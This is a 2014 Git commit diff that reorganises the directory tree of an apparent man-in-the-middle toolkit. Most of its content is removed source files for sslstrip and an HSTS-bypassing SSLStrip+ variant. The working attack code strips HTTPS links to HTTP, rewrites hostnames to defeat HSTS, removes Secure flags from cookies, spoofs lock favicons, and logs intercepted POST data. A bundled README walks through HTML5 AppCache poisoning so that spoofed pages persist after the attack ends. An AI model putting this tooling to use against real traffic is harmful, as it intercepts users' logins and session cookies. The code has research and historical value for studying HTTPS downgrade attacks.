major dir tree overhaul

This commit is contained in:
byt3bl33d3r 2014-12-07 22:20:27 +01:00
commit 12f610a0c3
36 changed files with 142 additions and 98 deletions

View file

@ -33,7 +33,7 @@ from SSLServerConnection import SSLServerConnection
from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
from ProxyPlugins import ProxyPlugins
from libs.sergioproxy.ProxyPlugins import ProxyPlugins
class ClientRequest(Request):

View file

@ -1,212 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import urlparse, logging, os, sys, random, re
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
from twisted.web.http import HTTPClient
from twisted.internet import ssl
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ClientFactory
from ServerConnectionFactory import ServerConnectionFactory
from ServerConnectionHSTS import ServerConnection
from SSLServerConnectionHSTS import SSLServerConnection
from URLMonitorHSTS import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
from ProxyPlugins import ProxyPlugins
class ClientRequest(Request):
''' This class represents incoming client requests and is essentially where
the magic begins. Here we remove the client headers we dont like, and then
respond with either favicon spoofing, session denial, or proxy through HTTP
or SSL to the server.
'''
def __init__(self, channel, queued, reactor=reactor):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
self.plugins = ProxyPlugins.getInstance()
# self.uniqueId = random.randint(0, 10000)
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
if 'accept-encoding' in headers:
del headers['accept-encoding']
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'if-modified-since' in headers:
del headers['if-modified-since']
if 'strict-transport-security' in headers: #kill new hsts requests
del headers['strict-transport-security']
logging.info("Zapped HSTS header")
if 'cache-control' in headers:
del headers['cache-control']
if 'if-none-match' in headers:
del headers['if-none-match']
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
headers['host'] = host
headers['securelink'] = '1'
self.setHeader('Host',host)
self.plugins.hook()
return headers
def getPathFromUri(self):
if (self.uri.find("http://") == 0):
index = self.uri.find('/', 7)
return self.uri[index:]
return self.uri
def getPathToLockIcon(self):
if os.path.exists("lock.ico"): return "lock.ico"
scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico")
if os.path.exists(scriptPath): return scriptPath
logging.warning("Error: Could not find lock.ico")
return "lock.ico"
def handleHostResolvedSuccess(self, address):
headers = self.cleanHeaders()
# for header in headers:
# logging.debug("HEADER %s = %s",header,headers[header])
logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address))
lhost = self.getHeader("host").lower()
host = self.urlMonitor.URLgetRealHost("%s" % lhost)
client = self.getClientIP()
path = self.getPathFromUri()
try:
self.content.seek(0, 0)
except:
pass
postData = self.content.read()
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
url = 'http://' + host + path
headers['content-length'] = "%d" % len(postData)
self.dnsCache.cacheResolution(host, address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
logging.debug("Sending spoofed favicon response...")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers:
del headers['securelink']
logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url))
self.proxyViaSSL(address, self.method, path, postData, headers,
self.urlMonitor.getSecurePort(client, url))
else:
logging.debug("LEO Sending request via HTTP...")
self.proxyViaHTTP(address, self.method, path, postData, headers)
def handleHostResolvedError(self, error):
logging.warning("Host resolution error: " + str(error))
try:
self.finish()
except:
pass
def resolveHost(self, host):
address = self.dnsCache.getCachedAddress(host)
if address != None:
logging.debug("Host cached.")
return defer.succeed(address)
else:
logging.debug("Host not cached.")
return reactor.resolve(host)
def process(self):
host = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host'))
logging.debug("Resolving host: %s" % host)
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection
self.reactor.connectTCP(host, 80, connectionFactory)
def proxyViaSSL(self, host, method, path, postData, headers, port):
clientContextFactory = ssl.ClientContextFactory()
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = SSLServerConnection
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
def sendExpiredCookies(self, host, path, expireHeaders):
self.setResponseCode(302, "Moved")
self.setHeader("Connection", "close")
self.setHeader("Location", "http://" + host + path)
for header in expireHeaders:
self.setHeader("Set-Cookie", header)
self.finish()
def sendSpoofedFaviconResponse(self):
icoFile = open(self.getPathToLockIcon())
self.setResponseCode(200, "OK")
self.setHeader("Content-type", "image/x-icon")
self.write(icoFile.read())
icoFile.close()
self.finish()

View file

@ -1,47 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike, Krzysztof Kotowicz
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
from sslstrip.URLMonitor import URLMonitor
class DummyResponseTamperer:
'''
DummyResponseTamperer is an exemplary class for server response tampering.
'''
def __init__(self, config):
self.config = config
self.urlMonitor = URLMonitor.getInstance()
logging.log(logging.DEBUG, "Tampering enabled.")
def isEnabled(self):
return self.config["enabled"]
def tamper(self, url, data, headers, req_headers, ip):
if not self.isEnabled():
return data
# headers manipulation - see http://twistedmatrix.com/documents/10.1.0/api/twisted.web.http_headers.Headers.html
# setting headers
#headers.setRawHeaders("X-aaa", ["aaa"])
# getting headers
#headers.getRawHeaders("Content-Type")
return data

View file

@ -1,96 +0,0 @@
# Copyright (c) 2010-2011 Ben Schmidt
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import sys
import inspect
class ProxyPlugins:
'''
This class does some magic so that all we need to do in
ServerConnection is do a self.plugins.hook() call
and we will call any plugin that implements the function
that it came from with the args passed to the original
function.
To do this, we are probably abusing the inspect module,
and if it turns out to be too slow it can be changed. For
now, it's nice because it makes for very little code needed
to tie us in.
Sadly, propagating changes back to the function is not quite
as easy in all cases :-/ . Right now, changes to local function
vars still have to be set back in the function. This only happens
in handleResponse, but is still annoying.
'''
_instance = None
def setPlugins(self,plugins):
'''Set the plugins in use'''
self.plist = []
#build a lookup list
#need to clean up in future
self.pmthds = {}
for p in plugins:
self.addPlugin(p)
def addPlugin(self,p):
'''Load a plugin'''
self.plist.append(p)
for mthd in p.implements:
try:
self.pmthds[mthd].append(getattr(p,mthd))
except KeyError:
self.pmthds[mthd] = [getattr(p,mthd)]
def removePlugin(self,p):
'''Unload a plugin'''
self.plist.remove(p)
for mthd in p.implements:
self.pmthds[mthd].remove(p)
def hook(self):
'''Magic to hook various function calls in sslstrip'''
#gets the function name and args of our caller
frame = sys._getframe(1)
fname = frame.f_code.co_name
keys,_,_,values = inspect.getargvalues(frame)
#assumes that no one calls del on an arg :-/
args = {}
for key in keys:
args[key] = values[key]
#prevent self conflict
args['request'] = args['self']
del args['self']
#calls any plugin that has this hook
try:
for f in self.pmthds[fname]:
a = f(**args)
if a != None: args = a
except KeyError:
pass
#pass our changes to the locals back down
return args
def getInstance():
if ProxyPlugins._instance == None:
ProxyPlugins._instance = ProxyPlugins()
return ProxyPlugins._instance
getInstance = staticmethod(getInstance)

View file

@ -1,44 +0,0 @@
I've modified sslstrip to be able to tamper with server responses.
One prepared example of tampering attack is HTML5 AppCache poisoning attack that places the
modified responses in browsers long-lasting HTML5 AppCache so that the spoofing continues
even after the victim is no longer MITMed.
Exemplary response tampering with HTML AppCachePoison:
1) python sslstrip.py -t app_cache_poison/config.ini
2) While under MITM, visit http://example.com to display tampered content
3) Visit http://www.facebook.com in AppCache supporting browser (Chrome, Firefox, Opera, Safari).
In Firefox you have to agree to store offline content, Chrome does not display any confirmations.
4) Stop MITM, restart browser, go for coffee or holidays
5) Visit http://www.facebook.com again - the spoofed content is still there!
As a bonus, once google analytics HTTP version will be requested, the spoofed content of it will be cached for 10 years.
EASY LOCAL TESTING MITM (for Ubuntu systems):
# create sslstrip admin user
# forward local traffic
$ sudo ./testmitm.sh start `id -u sslstrip`
# run sslstrip to hijack traffic
$ chown -R sslstrip /path/to/sslstrip/
$ su sslstrip
$ python sslstrip.py -t app_cache_poison/config.ini -p
# stop
$ sudo ./testmitm.sh stop
More info:
http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html
This functionality has been added by Krzysztof Kotowicz
<kkotowicz at gmail dot com>

View file

@ -1,13 +0,0 @@
Originally, sergio-proxy was a standalone implementation of a
transparent proxy using the Twisted networking framework
for Python. However, sslstrip uses almost *exactly* the
same interception method, so I decided to use sslstrip's
more mature libraries and try to provide a simple plugin
interface to grab the data.
The only file that has been modified from sslstrip is the
ServerConnection.py file, from which we can hook at certain
important points during the intercept.
Copyright 2011, Ben Schmidt
Released under the GPLv3

View file

@ -1,11 +0,0 @@
SSLStrip+
=========
This is a new version of [Moxie´s SSLstrip] (http://www.thoughtcrime.org/software/sslstrip/) with the new feature to avoid HTTP Strict Transport Security (HSTS) protection mechanism.
This version changes HTTPS to HTTP as the original one plus the hostname at html code to avoid HSTS. Check my slides at BlackHat ASIA 2014 [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES] (http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) for more information.
For this to work you also need a DNS server that reverse the changes made by the proxy, you can find it at https://github.com/LeonardoNve/dns2proxy.
Demo video at: http://www.youtube.com/watch?v=uGBjxfizy48

View file

@ -1,62 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike, Krzysztof Kotowicz
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, ConfigParser
class ResponseTampererFactory:
'''
ResponseTampererFactory creates response tamperer that modifies responses to clients based on config file setting.
'''
_instance = None
_default_config = {"enabled": False, "tamper_class": "sslstrip.DummyResponseTamperer"}
def __init__(self):
pass
def createTamperer(configFile):
logging.debug(logging.DEBUG, "Reading tamper config file: %s" % (configFile))
config = ResponseTampererFactory._default_config.copy()
if configFile:
config.update(ResponseTampererFactory.parseConfig(configFile))
if config['enabled']:
logging.log(logging.DEBUG, "Loading tamper class: %s" % (config["tamper_class"]))
m = __import__(config["tamper_class"], globals(), locals(), config["tamper_class"])
return getattr(m, m.__name__.replace(m.__package__ + ".", ''))(config)
def parseConfig(configFile):
config = ConfigParser.ConfigParser()
config.read(configFile)
readConfig = config._sections
readConfig.update(config.defaults())
return readConfig
def getTampererInstance():
return ResponseTampererFactory._instance
def buildTamperer(configFile):
if ResponseTampererFactory._instance == None:
ResponseTampererFactory._instance = ResponseTampererFactory.createTamperer(configFile)
getTampererInstance = staticmethod(getTampererInstance)
buildTamperer = staticmethod(buildTamperer)
createTamperer = staticmethod(createTamperer)
parseConfig = staticmethod(parseConfig)

View file

@ -1,121 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string
from ServerConnectionHSTS import ServerConnection
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
logging.debug("LEO Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
if dominio in real:
v=" Domain=%s"%real[dominio]
logging.debug("LEO New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
logging.debug("Found path-relative link in secure transmission: " + link)
logging.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
logging.debug("Found relative link in secure transmission: " + link)
logging.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data

View file

@ -20,9 +20,9 @@ import logging, re, string, random, zlib, gzip, StringIO, sys
import plugins
from twisted.web.http import HTTPClient
from ResponseTampererFactory import ResponseTampererFactory
from libs.sslstripkoto.ResponseTampererFactory import ResponseTampererFactory
from URLMonitor import URLMonitor
from ProxyPlugins import ProxyPlugins
from libs.sergioproxy.ProxyPlugins import ProxyPlugins
class ServerConnection(HTTPClient):

View file

@ -1,214 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string, random, zlib, gzip, StringIO
import plugins
from twisted.web.http import HTTPClient
from ResponseTampererFactory import ResponseTampererFactory
from URLMonitorHSTS import URLMonitor
from ProxyPlugins import ProxyPlugins
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
comes back is examined. The headers we dont like are removed, and the links are stripped
from HTTPS to HTTP.
'''
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
# urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
self.urlMonitor = URLMonitor.getInstance()
self.responseTamperer = ResponseTampererFactory.getTampererInstance()
self.plugins = ProxyPlugins.getInstance()
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
def getLogLevel(self):
return logging.DEBUG
def getPostPrefix(self):
return "POST"
def sendRequest(self):
if self.command == 'GET':
logging.info("%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host']))
self.plugins.hook()
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.items():
logging.debug(self.getLogLevel(), "Sending header: %s : %s" % (header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
if 'clientprfl' in self.uri:
self.plugins.hook()
elif 'keylog' in self.uri:
self.plugins.hook()
else:
logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData))
self.transport.write(self.postData)
def connectionMade(self):
logging.debug(self.getLogLevel(), "HTTP connection made.")
self.plugins.hook()
self.sendRequest()
self.sendHeaders()
if (self.command == 'POST'):
self.sendPostData()
def handleStatus(self, version, code, message):
logging.debug(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
logging.debug("Got server header: %s:%s" % (key, value))
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
logging.debug("Response is image content, not scanning...")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
logging.debug("Response is compressed...")
self.isCompressed = True
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
self.plugins.hook()
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
if self.length == 0:
self.shutdown()
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
else:
HTTPClient.handleResponsePart(self, data)
def handleResponseEnd(self):
if (self.isImageRequest):
self.shutdown()
else:
try:
HTTPClient.handleResponseEnd(self)
except:
pass
def handleResponse(self, data):
if (self.isCompressed):
logging.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
logging.debug("Read from server:\n" + data)
#logging.log(self.getLogLevel(), "Read from server:\n <large data>" )
data = self.replaceSecureLinks(data)
#Hook the ResponseTampererFactory
if self.responseTamperer:
data = self.responseTamperer.tamper(self.client.uri, data, self.client.responseHeaders, self.client.getAllHeaders(), self.client.getClientIP())
res = self.plugins.hook()
data = res['data']
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
try:
self.client.write(data) #Gets rid of some generic errors
except:
pass
try:
self.shutdown()
except:
logging.info("Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
sustitucion = {}
patchDict = self.urlMonitor.patchDict
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
logging.debug("Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
logging.debug("LEO replacing %s => %s"%(url,nuevaurl))
sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl)
#data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#logging.debug("LEO DEBUG received data:\n"+data)
#data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
#data = re.sub(ServerConnection.urlTypewww, 'http://w', data)
#if data.find("http://w.face")!=-1:
# logging.debug("LEO DEBUG Found error in modifications")
# raw_input("Press Enter to continue")
#return re.sub(ServerConnection.urlType, 'http://web.', data)
return data
def shutdown(self):
if not self.shutdownComplete:
self.shutdownComplete = True
try:
self.client.finish()
self.transport.loseConnection()
except:
pass

View file

@ -1,29 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from twisted.web.http import HTTPChannel
from ClientRequestHSTS import ClientRequest
class StrippingProxy(HTTPChannel):
'''sslstrip is, at heart, a transparent proxy server that does some unusual things.
This is the basic proxy server class, where we get callbacks for GET and POST methods.
We then proxy these out using HTTP or HTTPS depending on what information we have about
the (connection, client_address) tuple in our cache.
'''
requestFactory = ClientRequest

View file

@ -1,107 +0,0 @@
# URLMonitor
import re
import logging
from configobj import ConfigObj
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = {} # LEO: diccionario host / sustitucion
real = {} # LEO: diccionario host / real
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
'return"https:"':'return"http:"'
}
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.faviconReplacement = False
hsts_config = ConfigObj("./config/hsts_bypass.cfg")
for k,v in hsts_config.items():
self.sustitucion[k] = v
self.real[v] = k
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
return True
return (client,url) in self.strippedURLs
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
host = host[0:portIndex]
port = host[portIndex+1:]
if len(port) == 0:
port = 443
#LEO: Sustituir HOST
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url))
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+self.sustitucion[host]+path
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self,host):
logging.debug("Parsing host: %s"%host)
if self.real.has_key(host):
logging.debug("New host: %s"%self.real[host])
return self.real[host]
else:
logging.debug("New host: %s"%host)
return host
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
getInstance = staticmethod(getInstance)